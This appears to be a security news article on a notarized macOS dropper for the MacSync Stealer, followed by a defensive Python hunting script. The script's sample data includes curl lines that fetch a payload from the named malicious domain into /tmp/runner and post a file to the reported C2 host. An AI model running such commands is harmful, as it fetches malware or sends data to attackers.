A newly discovered variant of the MacSync Stealer is exploiting Apple’s trusted app ecosystem by distributing infostealing payloads through signed, notarized Swift applications, according to recent research from Jamf Threat Labs.
This revamped version abandons older execution tricks in favor of stealthier, hands‑off infection chains that can easily bypass user suspicion and built‑in macOS defenses.
Signed and Notarized, Yet Malicious
Unlike previous versions that relied on user‑assisted “drag‑to‑terminal” or “ClickFix” commands, the latest MacSync Stealer arrives as a notarized Swift application embedded in a disk image named zk-call-messenger-installer-3.9.2-lts.dmg, distributed via zkcall[.]net.
Despite being code-signed under Apple’s Developer Team ID GNJLS3UYZ4 (since revoked), the installer silently downloads its payload without user interaction.
Once executed, the dropper retrieves an encoded script from a remote server and runs it through a Swift‑based helper binary.

This executable, titled runtimectl, acts as a downloader that validates internet connectivity, maintains a log file at ~/Library/Logs/UserSyncWorker.log, and creates supporting files within ~/Library/Application Support/UserSyncWorker/ to manage scheduling and persistence.
Jamf’s analysis noted that the application bundle was unusually large (25.5 MB) because of embedded decoy PDFs intended to obscure its purpose.
VirusTotal samples revealed limited detection, with only one to thirteen antivirus engines flagging the files, often classifying them as generic downloaders associated with the Coinminer or OOOID malware families.
Evasive Execution and C2 Behavior
The runtimectl binary’s key routine, runInstaller(), enforces a one‑hour execution limit to prevent repeated runs.
When network access is confirmed, it fetches an obfuscated payload from https[:]//gatemaden.space/curl/985683… using a custom curl command that includes subtle flag changes (splitting -fsSL into -fL -sS and adding --noproxy), likely to improve reliability and evade detection.
The downloaded script, stored temporarily at /tmp/runner, matches payloads from earlier MacSync Stealer campaigns and communicates with the focusgroovy[.]com domain previously tied to MacSync’s command‑and‑control infrastructure.
Before execution, the malware removes com.apple.quarantine attributes, validates the file with spctl, then runs and deletes it to minimize artifacts.
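The two detection opportunities the article describes, the fixed on-disk artifacts (the UserSyncWorker log and support directory, /tmp/runner) and the curl invocation whose flags are split so that a literal "-fsSL" match fails, can be checked with a small hunting script. The following is an added example written for this article, not Jamf’s code or anything from the sample itself: the paths and domains are taken from the write-up, the curl normalisation is a generic technique, and the process command lines in SAMPLE_PROCESS_EVENTS are constructed (the URL path is a placeholder, since the article only shows a truncated one).

```python
"""Hunting helpers for the MacSync dropper behaviour described in the article.

Added example, not the vendor's or the malware's code. File paths and domains
come from the write-up; sample command lines are constructed."""
import shlex
from pathlib import Path
from typing import Optional
from urllib.parse import urlparse

# Host artifacts named in the analysis, relative to the user's home, plus /tmp/runner.
HOME_ARTIFACTS = [
    "Library/Logs/UserSyncWorker.log",
    "Library/Application Support/UserSyncWorker",
]
KNOWN_DOMAINS = {"gatemaden.space", "focusgroovy.com", "zkcall.net"}

# curl short options that consume an argument (a common subset), so the argument
# is not mistaken for more bundled flags or for a URL.
SHORT_WITH_ARG = set("oAXHdbcuwxeTCmKFrEUzD")
LONG_WITH_ARG = {"--output", "--header", "--data", "--user-agent", "--proxy",
                 "--noproxy", "--max-time", "--connect-timeout", "--referer",
                 "--request", "--cookie", "--user"}


def find_artifacts(home: str, tmp_dir: str = "/tmp") -> list:
    """Return which of the dropper's known on-disk artifacts exist."""
    candidates = [Path(home) / rel for rel in HOME_ARTIFACTS]
    candidates.append(Path(tmp_dir) / "runner")
    return [str(p) for p in candidates if p.exists()]


def normalize_curl(cmd: str) -> tuple:
    """Canonicalise a curl command line into (flags, urls, output_path).

    Bundled short flags are expanded one letter at a time, so '-fsSL' and
    '-fL -sS' produce the same flag set. A '-o PATH', '--output PATH' or a
    '> PATH' shell redirect is captured as the output path."""
    argv = shlex.split(cmd)
    if not argv or Path(argv[0]).name != "curl":
        return set(), [], None
    flags, urls = set(), []
    output: Optional[str] = None
    tokens = iter(argv[1:])
    for tok in tokens:
        if tok == ">":                                   # shell redirect
            output = next(tokens, None)
        elif tok.startswith("--"):
            name, _, inline = tok.partition("=")
            flags.add(name)
            if name in LONG_WITH_ARG and not inline:
                value = next(tokens, None)               # consume the argument
                if name == "--output":
                    output = value
            elif name == "--output":
                output = inline
        elif tok.startswith("-") and len(tok) > 1:
            letters = tok[1:]
            for i, ch in enumerate(letters):
                flags.add("-" + ch)
                if ch in SHORT_WITH_ARG:                 # rest of token or next token
                    value = letters[i + 1:] or next(tokens, None)
                    if ch == "o":
                        output = value
                    break
        else:
            urls.append(tok)
    return flags, urls, output


def dropper_indicators(cmd: str) -> list:
    """Indicators from the article, evaluated on the canonical form so that
    flag splitting does not defeat the match."""
    flags, urls, output = normalize_curl(cmd)
    hits = []
    if {"-f", "-s", "-S", "-L"} <= flags:
        hits.append("silent-fail-follow-fetch")
    if "--noproxy" in flags:
        hits.append("noproxy")
    if output and output.startswith("/tmp/"):
        hits.append("writes-tmp")
    for u in urls:
        host = urlparse(u).hostname or ""
        if host in KNOWN_DOMAINS or host.endswith(tuple("." + d for d in KNOWN_DOMAINS)):
            hits.append("known-c2-domain:" + host)
    return hits


# Constructed process-execution lines; PLACEHOLDER stands in for the real URL path.
SAMPLE_PROCESS_EVENTS = [
    "curl -fsSL https://example.org/brew-install.sh",
    "curl -fL -sS --noproxy '*' https://gatemaden.space/curl/PLACEHOLDER > /tmp/runner",
    "curl -fsSL -o /tmp/runner https://gatemaden.space/curl/PLACEHOLDER",
    "curl -X POST -d @report.json https://focusgroovy.com/api",
]


def triage(events) -> dict:
    """Map each command line to its list of indicators."""
    return {e: dropper_indicators(e) for e in events}


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_PROCESS_EVENTS).items():
        print(("ALERT" if len(hits) >= 2 else "ok   "), cmd, "->", hits)
    print("artifacts on this host:", find_artifacts(str(Path.home())))
```

The first sample line is a benign-looking fetch and only gets the generic "silent-fail-follow-fetch" indicator; the two gatemaden.space variants score identically despite their different flag spelling, which is the point of normalising before matching. In practice the command lines would come from an EDR process-event feed or unified log rather than a hard-coded list.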
Jamf reported the malicious developer certificate to Apple, which has since revoked it. The discovery underscores a growing trend of macOS malware leveraging Apple’s notarization system to mask malicious intent.
Security experts warn that code signing alone no longer guarantees security, urging macOS users and administrators to enable advanced threat controls and block‑mode detections to counter evolving infostealers such as MacSync.